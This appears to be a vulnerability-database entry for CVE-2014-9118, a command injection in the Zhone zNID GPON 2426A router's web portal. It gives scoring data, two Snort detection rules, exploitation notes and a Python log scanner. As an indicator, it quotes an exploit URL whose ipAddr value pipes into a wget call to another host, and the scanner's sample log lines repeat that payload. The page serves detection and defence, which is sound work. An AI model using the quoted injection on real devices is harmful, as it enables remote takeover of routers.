cbcvebase.
CVE-2014-9118
published 2017-10-17


Priority: P186, high, 8.8 (CVSS 3.0)
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Tags: ITW, EXPLOIT, VulnCheck KEV
Exploited in the wild
EPSS: 53.36% (98.9th percentile)
The web administrative portal in Zhone zNID GPON 2426A before S3.0.501 allows remote attackers to execute arbitrary commands via shell metacharacters in the ipAddr parameter to zhnping.cmd.

Detection & IOCs (extracted from sources)

url: `/zhnping.cmd?&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3`
path: `/zhnping.cmd`
snort
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M1"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=ping"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036749; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
snort
ET EXPLOIT Zhone ZNID GPON 2426A any any (msg:"ET EXPLOIT Zhone ZNID GPON 2426A < S3.0.501 RCE (CVE-2014-9118) M2"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/zhnping.cmd?"; fast_pattern; content:"test=traceroute"; content:"sessionKey="; content:"ipAddr="; pcre:"/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri"; reference:url,www.exploit-db.com/exploits/38453; reference:url,cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot-malware-enemybot-now-targeting-content-management-system-servers; reference:cve,2014-9118; classtype:attempted-admin; sid:2036750; rev:2; metadata:attack_target Server, created_at 2022_06_02, cve CVE_2014_9118, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, updated_at 2024_06_23, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
  • The Snort PCRE pattern for detecting shell metacharacter injection in the `ipAddr` parameter is: `/^[a-z0-9\.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))/Ri` — match against the value of `ipAddr=` in the URI.
  • Exploit has been observed in the wild as part of EnemyBot IoT malware campaigns targeting public-facing devices.
  • The exploit PoC uses URL-encoded shell metacharacters such as `%7c` (pipe) to bypass naive input filters in the `ipAddr` parameter.
  • The exploit requires a valid `sessionKey` in the request. Low-privileged authenticated users (not just admins) can trigger the RCE, as the web portal only enforces access control client-side via JavaScript.
  • The vulnerability affects Zhone zNID GPON 2426A firmware versions before S3.0.501. Detection rules should be scoped to devices running versions prior to this.
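
The two rules' conditions, translated to Python and run over access-log lines, as an added example that is not part of the original page or of the rule authors' code. The log format, the sample lines and the names `classify_uri`, `scan` and `_line` are assumptions made for illustration; the last sample shows that the pattern's literal `&` (`\x26`) also matches a clean `ipAddr` value that is followed by another parameter, so hits need triage.

```python
import re

# The rules' PCRE, translated. The /R flag (start right after the preceding
# content match "ipAddr=") is reproduced by calling .match() at that offset.
INJECTION_RE = re.compile(
    r"[a-z0-9.]+(?:[\x60\x3b\x7c\x26]|%60|%3b|%7c|%26"
    r"|(?:[\x3c\x3e\x24]|%3c|%3e|%24)(?:\x28|%28))",
    re.IGNORECASE,
)
REQUIRED = ("/zhnping.cmd?", "sessionKey=", "ipAddr=")  # the rules' content matches
VARIANTS = {"test=ping": "M1", "test=traceroute": "M2"}  # sid 2036749 / 2036750
REQUEST_RE = re.compile(r'"GET (\S+) HTTP/[\d.]+"')  # the rules only cover GET


def classify_uri(uri):
    """Return "M1" or "M2" if the raw URI meets that rule's conditions, else None."""
    variant = next((v for tok, v in VARIANTS.items() if tok in uri), None)
    if variant is None or not all(tok in uri for tok in REQUIRED):
        return None
    # Test every "ipAddr=" occurrence, not only the first one in the URI.
    pos = uri.find("ipAddr=")
    while pos != -1:
        if INJECTION_RE.match(uri, pos + len("ipAddr=")):
            return variant
        pos = uri.find("ipAddr=", pos + 1)
    return None


def scan(log_lines):
    """Yield (line_number, variant) for each access-log line that matches."""
    for number, line in enumerate(log_lines, start=1):
        request = REQUEST_RE.search(line)
        variant = classify_uri(request.group(1)) if request else None
        if variant:
            yield number, variant


def _line(query):  # hypothetical helper: wraps a query in a constructed log line
    return f'10.0.0.5 - - [01/Jan/2024:00:00:01 +0000] "GET /zhnping.cmd?{query} HTTP/1.1" 200 512'


SAMPLE_LOG = [_line(q) for q in (  # constructed; the first query is this page's URL
    "&test=traceroute&sessionKey=985703201&ipAddr=192.168.1.1|wget%20http://192.168.1.17/l00per_was_here&ttl=30&wait=3&queries=3",
    "&test=ping&sessionKey=985703201&ipAddr=192.168.1.1%7cwget%20http://192.168.1.17/l00per_was_here",  # encoded pipe
    "&test=ping&sessionKey=985703201&ttl=30&ipAddr=192.168.1.1",  # clean value, ipAddr last: no match
    "&test=ping&sessionKey=985703201&ipAddr=192.168.1.1&ttl=30",  # clean value followed by "&": matches
)]
if __name__ == "__main__":
    print(list(scan(SAMPLE_LOG)))
```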

CVSS provenance

nvd · v3.0 · 8.8 HIGH · CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 9.0 CRITICAL · AV:N/AC:L/Au:S/C:C/I:C/A:C
vulncheck · 8.8 HIGH